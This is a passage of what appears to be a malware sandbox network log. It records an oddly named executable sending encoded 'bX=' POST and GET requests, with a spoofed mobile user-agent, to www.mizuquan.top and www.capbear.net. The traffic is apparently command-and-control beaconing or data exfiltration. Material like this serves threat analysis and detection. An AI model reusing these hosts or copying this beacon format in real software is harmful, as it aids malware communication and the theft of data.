                              Data Raw: 62 58 3d 4b 6c 77 76 31 45 45 4e 6d 63 63 50 79 4b 38 5a 50 68 79 6a 4f 59 38 70 66 76 53 79 4c 44 55 44 63 4d 6e 2f 51 5a 64 54 36 5a 74 2f 51 47 52 2b 66 46 43 62 52 41 37 57 75 46 61 4f 77 52 2b 35 62 66 54 4a 72 44 37 50 68 32 54 62 34 6e 43 4d 79 7a 58 7a 59 75 71 4e 6b 37 77 42 30 43 7a 52 75 55 65 38 58 30 4d 59 54 66 67 2f 69 66 6c 4c 6e 64 57 6c 37 42 46 5a 42 32 52 45 53 48 79 2f 63 79 48 7a 57 36 43 62 37 6a 6c 79 53 47 74 65 58 35 4d 75 41 74 54 54 30 78 58 6e 6f 33 44 36 68 69 73 54 39 59 68 45 2f 4e 6a 30 36 76 6c 50 70 37 41 53 75 37 35 62 34 5a 53 71 75 65 61 33 6b 4f 6c 61 34 4b 6b 3d
                              Data Ascii: bX=Klwv1EENmccPyK8ZPhyjOY8pfvSyLDUDcMn/QZdT6Zt/QGR+fFCbRA7WuFaOwR+5bfTJrD7Ph2Tb4nCMyzXzYuqNk7wB0CzRuUe8X0MYTfg/iflLndWl7BFZB2RESHy/cyHzW6Cb7jlySGteX5MuAtTT0xXno3D6hisT9YhE/Nj06vlPp7ASu75b4ZSquea3kOla4Kk=
                              Sep 16, 2024 09:31:59.876331091 CEST691INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:31:59 GMT
                              Content-Type: text/html
                              Content-Length: 548
                              Connection: close
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              34192.168.2.55490543.242.202.16980728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:32:01.567409039 CEST744OUTPOST /ed2j/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.mizuquan.top
                              Origin: http://www.mizuquan.top
                              Referer: http://www.mizuquan.top/ed2j/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 4b 6c 77 76 31 45 45 4e 6d 63 63 50 79 71 4d 5a 66 32 4f 6a 4a 34 38 32 42 2f 53 79 42 6a 55 35 63 4d 72 2f 51 62 77 49 35 76 64 2f 54 6e 68 2b 52 6b 43 62 53 41 37 57 68 6c 62 45 74 42 2f 33 62 66 58 33 72 43 48 50 68 32 48 62 34 6c 61 4d 6e 51 76 77 62 65 71 4c 69 37 77 48 70 53 7a 52 75 55 65 38 58 30 59 79 54 62 4d 2f 69 73 74 4c 6d 34 37 7a 6e 78 46 65 4c 57 52 45 59 58 7a 30 63 79 47 6b 57 2f 61 78 37 67 4e 79 53 47 64 65 5a 49 4d 74 4a 74 54 56 77 78 57 76 70 43 6a 30 35 53 30 45 77 37 30 31 67 4f 58 2b 79 35 49 6c 7a 5a 49 36 39 62 56 6a 6f 4b 61 64 2f 75 37 65 2b 74 31 71 6d 64 79 49 30 6a 36 68 6b 2f 62 47 30 36 49 4c 71 35 6d 65 32 31 38 43
                              Data Ascii: bX=Klwv1EENmccPyqMZf2OjJ482B/SyBjU5cMr/QbwI5vd/Tnh+RkCbSA7WhlbEtB/3bfX3rCHPh2Hb4laMnQvwbeqLi7wHpSzRuUe8X0YyTbM/istLm47znxFeLWREYXz0cyGkW/ax7gNySGdeZIMtJtTVwxWvpCj05S0Ew701gOX+y5IlzZI69bVjoKad/u7e+t1qmdyI0j6hk/bG06ILq5me218C
                              Sep 16, 2024 09:32:02.425764084 CEST691INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:32:02 GMT
                              Content-Type: text/html
                              Content-Length: 548
                              Connection: close
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              35192.168.2.55490643.242.202.16980728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:32:04.110135078 CEST1761OUTPOST /ed2j/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.mizuquan.top
                              Origin: http://www.mizuquan.top
                              Referer: http://www.mizuquan.top/ed2j/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 4b 6c 77 76 31 45 45 4e 6d 63 63 50 79 71 4d 5a 66 32 4f 6a 4a 34 38 32 42 2f 53 79 42 6a 55 35 63 4d 72 2f 51 62 77 49 35 76 56 2f 54 55 70 2b 65 6a 2b 62 54 41 37 57 6f 46 62 48 74 42 2f 36 62 62 37 7a 72 43 4c 35 68 30 2f 62 71 32 53 4d 6a 52 76 77 41 4f 71 4c 75 62 77 47 30 43 7a 2b 75 55 75 34 58 30 49 79 54 62 4d 2f 69 74 64 4c 77 64 58 7a 6c 78 46 5a 42 32 52 59 53 48 7a 63 63 79 76 52 57 2b 75 4c 36 51 74 79 52 6d 4e 65 55 65 34 74 49 4e 54 58 31 78 58 70 70 43 6d 32 35 53 59 2b 77 34 6f 54 67 4f 2f 2b 79 2f 42 46 69 4c 41 62 76 71 74 39 72 70 69 6b 6d 37 54 46 38 75 4a 78 35 64 32 72 35 42 65 71 6d 6f 6a 71 32 4c 74 59 70 59 36 56 6d 69 6f 49 50 73 73 41 43 76 6d 71 46 77 64 56 31 78 78 6e 47 44 6e 2f 33 33 50 69 43 59 63 6e 33 36 75 63 34 74 69 71 46 55 43 2f 65 51 6a 6c 56 79 52 46 49 2f 6c 2b 39 6c 70 54 45 46 4d 2f 33 31 77 46 79 56 30 6f 39 58 52 50 43 39 68 53 6f 4b 39 2f 4a 49 32 58 68 53 56 30 38 35 38 71 61 69 41 75 58 47 4f 32 46 42 4b 63 30 4c 34 37 4a 33 74 34 76 46 65 [TRUNCATED]
                              Data Ascii: bX=Klwv1EENmccPyqMZf2OjJ482B/SyBjU5cMr/QbwI5vV/TUp+ej+bTA7WoFbHtB/6bb7zrCL5h0/bq2SMjRvwAOqLubwG0Cz+uUu4X0IyTbM/itdLwdXzlxFZB2RYSHzccyvRW+uL6QtyRmNeUe4tINTX1xXppCm25SY+w4oTgO/+y/BFiLAbvqt9rpikm7TF8uJx5d2r5Beqmojq2LtYpY6VmioIPssACvmqFwdV1xxnGDn/33PiCYcn36uc4tiqFUC/eQjlVyRFI/l+9lpTEFM/31wFyV0o9XRPC9hSoK9/JI2XhSV0858qaiAuXGO2FBKc0L47J3t4vFeSBNV1onTWEL3CuOF8QcOzPfl8Fo6S5HVZ5AX0N6j22evLQ01kRNSte5FnXoT8sSqbBYwqZjO4A2ykQJ6hxX7TM0zEGyH/ZMZZwblXn4KniHj3JRzACOn93FYthZuqbERAYWr2SI3uShjsA93N20JOLT4kungOKQy8UgFywnw70LJPF1OYoTusHxoqajfAcjTCTIQFl1F2HzMB8roRHtspmkzv4uW8FoAracJuGBj6FUitND6iloWZ3xS7c78YxeApvnx2OhA265kLUC+Hh0ZQD62yLfiL1vdCwexdnYOh11wij7fZIIVNn3CgDW78a/TWpjFd2NLplT6s4hwC9WFp+szpPK0neMBWapgppVzPWthtx1IZ3xDyGC9O8hnbL4ptfDHWwDfoXNCDHt4X1LvbPS0/QhXyLcWOX44wCxqv7QC8SMKXqcj0Ke9jLc7ccFLZ+53WRjaD6LVz3ITWWGqrnFTVuwYC0PSpNlkln7sbBUa+PS5oqXIFEb9PXfegRoA6ey8E9yII3bc1pBjLM3O3JSeheQBqKwAyBdhxmQwS7mwC6E0643+C5Jd/9io311MvgFEjQzoRxBOaQxpYMOTvWqfawtTFcK+uYelT0oium4Rqx0ViwqmjgBBMYc2Uud4RZcor7Q/V7v3kTeOUwYBIicdCD76Fc0IDW [TRUNCATED]
                              Sep 16, 2024 09:32:04.962973118 CEST691INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:32:04 GMT
                              Content-Type: text/html
                              Content-Length: 548
                              Connection: close
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              36192.168.2.55490743.242.202.16980728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:32:06.704241991 CEST462OUTGET /ed2j/?bX=HnYP2yoU4dt40olsHjvCR7kBP/y2BgIkbcmGMLslyKV8dFp2SGuaYgvLul2clibdaJeHhADQmhDO4iexoifjcdOeiKY5v07N606wVFpuauJi0/RjjYjigABfPEh6YVaweA==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.mizuquan.top
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:32:07.548497915 CEST691INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:32:07 GMT
                              Content-Type: text/html
                              Content-Length: 548
                              Connection: close
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              37192.168.2.554908104.207.148.13780728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:32:20.735991955 CEST721OUTPOST /ijno/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.capbear.net
                              Origin: http://www.capbear.net
                              Referer: http://www.capbear.net/ijno/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 4f 6e 58 62 32 55 6f 66 7a 56 32 57 67 32 77 41 61 2f 55 63 5a 4a 69 78 58 33 50 56 55 67 65 37 73 38 31 34 51 73 36 78 6d 63 36 64 65 69 51 52 6f 51 37 6a 6c 2f 72 6d 62 78 32 57 44 77 49 37 39 77 51 74 68 35 44 62 68 4f 46 31 75 51 4d 4a 30 4d 37 51 76 37 63 74 45 30 50 50 54 4f 71 34 76 38 36 2f 6c 4d 33 53 55 50 39 59 33 49 78 69 63 4b 77 63 6a 6a 77 2f 71 34 74 72 36 77 6d 52 43 73 6a 63 55 37 45 79 64 73 6f 55 5a 75 56 73 4a 76 4e 6e 56 4c 64 71 37 59 36 61 47 2f 4a 2b 7a 75 30 33 52 41 74 45 65 54 66 4e 33 66 49 69 51 61 38 54 78 6c 50 77 75 78 41 39 43 2f 4d 5a 45 6d 4b 33 38 6e 30 3d
                              Data Ascii: bX=OnXb2UofzV2Wg2wAa/UcZJixX3PVUge7s814Qs6xmc6deiQRoQ7jl/rmbx2WDwI79wQth5DbhOF1uQMJ0M7Qv7ctE0PPTOq4v86/lM3SUP9Y3IxicKwcjjw/q4tr6wmRCsjcU7EydsoUZuVsJvNnVLdq7Y6aG/J+zu03RAtEeTfN3fIiQa8TxlPwuxA9C/MZEmK38n0=
                              Sep 16, 2024 09:32:21.303719044 CEST384INHTTP/1.1 301 Moved Permanently
                              Server: nginx/1.14.2
                              Date: Mon, 16 Sep 2024 07:32:21 GMT
                              Content-Type: text/html
                              Content-Length: 185
                              Connection: close
                              Location: https://www.capbear.net/ijno/
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.2</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              38192.168.2.554909104.207.148.13780728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:32:23.282674074 CEST741OUTPOST /ijno/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.capbear.net
                              Origin: http://www.capbear.net
                              Referer: http://www.capbear.net/ijno/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 4f 6e 58 62 32 55 6f 66 7a 56 32 57 67 53 30 41 59 63 73 63 65 70 69 2b 63 58 50 56 50 51 65 33 73 39 4a 34 51 74 2b 68 6d 75 65 64 65 47 63 52 70 53 44 6a 67 2f 72 6d 54 52 32 58 48 77 49 67 39 77 73 50 68 35 50 62 68 4e 35 31 75 55 41 4a 30 2f 44 54 39 62 63 6a 49 55 50 4e 4f 65 71 34 76 38 36 2f 6c 4d 69 2f 55 50 31 59 32 37 70 69 66 6f 59 54 34 44 77 38 74 34 74 72 2b 77 6d 56 43 73 6a 36 55 37 30 55 64 76 41 55 5a 76 4a 73 4a 36 68 6f 62 37 64 6b 32 34 37 31 43 2f 38 74 35 65 77 2f 62 6d 6b 35 44 51 6e 6d 2f 4a 6c 49 4b 34 30 37 69 46 6a 49 2b 69 49 4b 54 50 74 77 65 46 61 48 69 77 69 36 4c 43 49 55 45 49 50 65 74 48 44 31 42 55 41 4b 57 4c 6a 4f
                              Data Ascii: bX=OnXb2UofzV2WgS0AYcscepi+cXPVPQe3s9J4Qt+hmuedeGcRpSDjg/rmTR2XHwIg9wsPh5PbhN51uUAJ0/DT9bcjIUPNOeq4v86/lMi/UP1Y27pifoYT4Dw8t4tr+wmVCsj6U70UdvAUZvJsJ6hob7dk2471C/8t5ew/bmk5DQnm/JlIK407iFjI+iIKTPtweFaHiwi6LCIUEIPetHD1BUAKWLjO
                              Sep 16, 2024 09:32:23.858465910 CEST384INHTTP/1.1 301 Moved Permanently
                              Server: nginx/1.14.2
                              Date: Mon, 16 Sep 2024 07:32:23 GMT
                              Content-Type: text/html
                              Content-Length: 185
                              Connection: close
                              Location: https://www.capbear.net/ijno/
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.2</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              39192.168.2.554910104.207.148.13780728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:32:25.830563068 CEST1758OUTPOST /ijno/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.capbear.net
                              Origin: http://www.capbear.net
                              Referer: http://www.capbear.net/ijno/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 4f 6e 58 62 32 55 6f 66 7a 56 32 57 67 53 30 41 59 63 73 63 65 70 69 2b 63 58 50 56 50 51 65 33 73 39 4a 34 51 74 2b 68 6d 75 57 64 65 56 55 52 70 7a 44 6a 6e 2f 72 6d 5a 78 32 53 48 77 4a 69 39 77 45 4c 68 35 7a 6c 68 4c 39 31 74 33 49 4a 79 4f 44 54 32 62 63 6a 56 6b 50 4d 54 4f 71 58 76 38 71 37 6c 4d 79 2f 55 50 31 59 32 36 5a 69 4a 4b 77 54 2f 7a 77 2f 71 34 74 6e 36 77 6d 78 43 73 71 42 55 36 41 69 64 66 67 55 63 2f 5a 73 4c 4d 56 6f 5a 62 64 6d 7a 34 37 74 43 2f 68 31 35 65 38 5a 62 6d 34 48 44 51 66 6d 75 49 63 68 61 35 6b 67 35 56 44 37 73 31 49 55 53 37 6c 38 62 48 48 78 71 42 57 64 48 54 77 4e 49 76 54 2f 76 6e 57 6c 63 77 51 5a 45 38 47 62 6e 79 37 4d 2f 77 4c 75 76 2b 7a 77 32 4b 63 46 72 53 62 6f 42 4f 54 6b 6f 33 53 76 48 59 70 52 5a 58 55 76 53 56 64 6d 61 36 4b 52 78 44 6e 45 35 37 78 4a 6e 6a 47 50 59 36 48 59 30 57 6c 38 38 2b 37 42 58 2f 54 63 57 41 45 45 50 34 2f 56 6c 75 4f 6b 53 57 4e 46 54 38 76 52 4b 59 44 30 73 74 57 4e 75 31 36 2b 30 73 6b 7a 30 69 48 38 78 70 6f [TRUNCATED]
                              Data Ascii: bX=OnXb2UofzV2WgS0AYcscepi+cXPVPQe3s9J4Qt+hmuWdeVURpzDjn/rmZx2SHwJi9wELh5zlhL91t3IJyODT2bcjVkPMTOqXv8q7lMy/UP1Y26ZiJKwT/zw/q4tn6wmxCsqBU6AidfgUc/ZsLMVoZbdmz47tC/h15e8Zbm4HDQfmuIcha5kg5VD7s1IUS7l8bHHxqBWdHTwNIvT/vnWlcwQZE8Gbny7M/wLuv+zw2KcFrSboBOTko3SvHYpRZXUvSVdma6KRxDnE57xJnjGPY6HY0Wl88+7BX/TcWAEEP4/VluOkSWNFT8vRKYD0stWNu16+0skz0iH8xpo6ayXUpmljM4nU7Mz4CJappkj4GsvOgsPk5eS+VQkUYIo/nevaLWhXq9ctLwVtNv6IGjxVQ8jiEO370mddCq4vjHM01PyzglCqODoXfCGVnJLjCqY9MBdTjQP19f0cJqPkljfDtFpt08TjTrQ8JULvb4xoj4CVVriY4bc1Cl1Fa+WuA4MUNmt7fcHfPrWDnD1zI/Y3RaNdrJROVXq+prhl+wQopL1r3+vhk6nvrGr6Lt1C1ms0QnMgH39hWshuoFHSn2rYsedhQqysRmjGy02mtm1vOM9c2mSiZhNUxl3lKujzcKyqxxCh7HUDiKmMaTlvPFc9IsI3X1kXbWwR4L7F8q9rWw2MITzhROUcX67LOPrpOFoDFvEC4vGsLxEfklnP8zTyOHI1g9rb/y524VBIa8zGi/knM0nEydgKEMU7sgaau+LtZ1u/bEbLX2PvkmVw9lvs+pcLTz7jzIsmtEPwMxsC3Bo8QtpmlOBOUbh7BhqH/HutDt+7fgfxyKUQQmra2YqaL97GmRk2rRMr